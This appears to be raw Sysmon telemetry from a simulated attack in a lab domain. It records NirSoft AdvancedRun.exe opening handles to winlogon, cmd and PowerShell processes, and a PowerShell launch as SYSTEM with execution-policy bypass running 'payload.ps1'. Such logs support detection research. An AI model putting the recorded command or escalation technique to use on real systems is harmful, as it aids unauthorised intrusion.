20:13:54.013{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
m.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004074053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.003{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004072096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:23.551{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004069054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.384{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004069053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.382{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004069052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.382{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004069051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
